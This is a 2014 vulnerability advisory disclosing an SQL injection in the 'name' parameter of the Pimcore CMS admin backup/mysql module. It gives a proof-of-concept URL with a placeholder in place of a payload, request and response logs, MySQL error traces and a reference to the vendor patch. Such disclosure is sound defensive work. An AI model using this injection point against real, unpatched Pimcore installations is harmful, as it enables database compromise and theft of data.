212 lines
No EOL
11 KiB
Text
212 lines
No EOL
11 KiB
Text
Document Title:
|
|
===============
|
|
Pimcore v3.0 & v2.3.0 CMS - SQL Injection Vulnerability
|
|
|
|
|
|
References (Source):
|
|
====================
|
|
http://vulnerability-lab.com/get_content.php?id=1363
|
|
|
|
|
|
Release Date:
|
|
=============
|
|
2014-12-16
|
|
|
|
|
|
Vulnerability Laboratory ID (VL-ID):
|
|
====================================
|
|
1363
|
|
|
|
|
|
Common Vulnerability Scoring System:
|
|
====================================
|
|
6.4
|
|
|
|
|
|
Product & Service Introduction:
|
|
===============================
|
|
Pimcore is a powerful and robust Zend Framework based PHP content management system (CMS) for creating and managing digital
|
|
content and assets licensed under the open-source BSD license. Create outstanding digital experiences on the most flexible
|
|
content management platform available. Manage and edit any type of digital content, for any device and channel in a 100%
|
|
flexible and personalized way. Pimcore features award-winning single-source and multi-channel publishing functionality
|
|
making it easy to manage, update, and integrate content and data from various sources. With pimcore brands can create
|
|
and manage rich digital experiences for all of their output channels at once: web, mobile, apps, social platforms,
|
|
print and digital signage. With pimcore you can truly `edit once & reuse anywhere`.
|
|
|
|
(Copy of the Homepage: https://www.pimcore.org/ )
|
|
|
|
|
|
|
|
Abstract Advisory Information:
|
|
==============================
|
|
The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in the official Pimcore v3.0 & v2.3.0 Content Management System (Web-Application).
|
|
|
|
|
|
Vulnerability Disclosure Timeline:
|
|
==================================
|
|
2014-12-16: Public Disclosure (Vulnerability Laboratory)
|
|
|
|
|
|
Discovery Status:
|
|
=================
|
|
Published
|
|
|
|
|
|
Affected Product(s):
|
|
====================
|
|
Pimcore GmbH
|
|
Product: PimCore - Content Management System 3.0 Release Candidate & 2.3.0
|
|
|
|
|
|
Exploitation Technique:
|
|
=======================
|
|
Remote
|
|
|
|
|
|
Severity Level:
|
|
===============
|
|
High
|
|
|
|
|
|
Technical Details & Description:
|
|
================================
|
|
A remote sql injection web vulnerability has been discovered in the official Pimcore v3.0 & v2.3.0 Content Management System.
|
|
The vulnerability allows remote attackers and local privileged user accounts to inject own sql commands to compromise
|
|
the web-server dbms of pimcore.
|
|
|
|
The security vulnerability is located in the name value GET method request of the pimcore mysql module. Remote attackers
|
|
and local privileged user accounts are able to compromise the application service by injection of malicious sql commands. The request
|
|
method to inject the code is GET and the attack vector is on the application-side of the modules. Remote attackers are able to use the
|
|
inner application functions of the class module to perform an execution on the application-side unauthorized through the admin acp.
|
|
|
|
The security risk of the sql vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
|
|
Exploitation of the remote sql injection web vulnerability requires no privileged application user account or a low privileged
|
|
user account without user interaction. Successful exploitation of the sql injection vulnerability results in application and
|
|
web-service or dbms compromise.
|
|
|
|
Request Method(s):
|
|
[+] GET
|
|
|
|
Vulnerable Module(s):
|
|
[+] backup/mysql
|
|
|
|
Vulnerable Parameter(s):
|
|
[+] name
|
|
|
|
|
|
Proof of Concept (PoC):
|
|
=======================
|
|
The sql injection vulnerability can be exploited by remote attackers with low privileged application user account and without user interaction.
|
|
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
|
|
|
PoC:
|
|
./backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE
|
|
|
|
|
|
--- PoC Session Logs [GET] ---
|
|
Status: 200[OK]
|
|
GET http://pimcore.localhost:8080/admin/backup/mysql?_dc=1415886023081&name=-1%27[SQL INJECTION VULNERABILITY!]--&type=BASE%20TABLE
|
|
Load Flags[VALIDATE_NEVER LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[495] Mime Type[text/html]
|
|
Request Header:
|
|
Host[pimcore.localhost:8080]
|
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0]
|
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
|
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
|
Accept-Encoding[gzip, deflate]
|
|
Cookie[__utma=59704236.87754243.1415885491.1415885491.1415885491.1;
|
|
__utmb=59704236.1.10.1415885491; __utmc=59704236;
|
|
__utmz=59704236.1415885491.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
|
|
pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5]
|
|
Connection[keep-alive]
|
|
Response Header:
|
|
Date[Thu, 13 Nov 2014 13:55:50 GMT]
|
|
Server[Apache/2.2.22 (Debian)]
|
|
Set-Cookie[pimcore_admin_sid=28vctg6ilpedepa26b81gqeps5; path=/; HttpOnly]
|
|
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
|
|
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
|
|
Pragma[no-cache]
|
|
Connection[close]
|
|
Content-Encoding[gzip]
|
|
X-Powered-By[pimcore]
|
|
Content-Length[495]
|
|
Content-Type[text/html]
|
|
|
|
|
|
--- Error & Exception Logs ---
|
|
Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error:
|
|
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1'
|
|
in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77
|
|
-
|
|
Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...')
|
|
#1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...')
|
|
#2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...')
|
|
#3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array)
|
|
#4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...') #5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230):
|
|
call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77
|
|
-
|
|
Fatal error: Call to a member function isAllowed() on a non-object in /home/pimcore-service/www/pimcore/lib/Pimcore/Controller/Action/Admin/Element.php on line 37
|
|
-
|
|
Fatal error: Uncaught exception 'Zend_Db_Statement_Mysqli_Exception' with message 'Mysqli prepare error:
|
|
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1'' at line 1'
|
|
in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php:77
|
|
-
|
|
Stack trace: #0 /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement.php(115): Zend_Db_Statement_Mysqli->_prepare('SELECT * FROM -...')
|
|
#1 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Mysqli.php(388): Zend_Db_Statement->__construct(Object(Zend_Db_Adapter_Mysqli), 'SELECT * FROM -...')
|
|
#2 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(479): Zend_Db_Adapter_Mysqli->prepare('SELECT * FROM -...')
|
|
#3 /home/pimcore-service/www/pimcore/lib/Zend/Db/Adapter/Abstract.php(737): Zend_Db_Adapter_Abstract->query('SELECT * FROM -...', Array)
|
|
#4 [internal function]: Zend_Db_Adapter_Abstract->fetchAll('SELECT * FROM -...')
|
|
#5 /home/pimcore-service/www/pimcore/lib/Pimcore/Resource/Wrapper.php(230): call in /home/pimcore-service/www/pimcore/lib/Zend/Db/Statement/Mysqli.php on line 77
|
|
|
|
|
|
Solution - Fix & Patch:
|
|
=======================
|
|
The vulnerability can be patched by implementation of two prepared statements in the section were the vulnerable name value is in usage.
|
|
Encode and parse also the qrcode and mysql GET method request to prevent exploitation.
|
|
|
|
The fix for the backup routine is already in the main trunk and can be reviewed here:
|
|
https://github.com/pimcore/pimcore/commit/93067d865affa5a0110ae7e9904cbc5ff5868376
|
|
|
|
Note: The patch will be part of the next version (RC 2) and the final 3.0 release. You can verify it also by downloading the lastest build from pimcore.org/download.
|
|
|
|
|
|
Security Risk:
|
|
==============
|
|
The security risk of the sql injection web vulnerability in the pimcore content management system is estimated as high. (CVSS 6.4)
|
|
|
|
|
|
Credits & Authors:
|
|
==================
|
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
|
|
|
|
|
Disclaimer & Information:
|
|
=========================
|
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
|
|
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
|
|
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
|
|
|
Copyright © 2014 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
|
|
|
|
|
|
|
--
|
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
|
SERVICE: www.vulnerability-lab.com
|
|
CONTACT: research@vulnerability-lab.com
|
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt |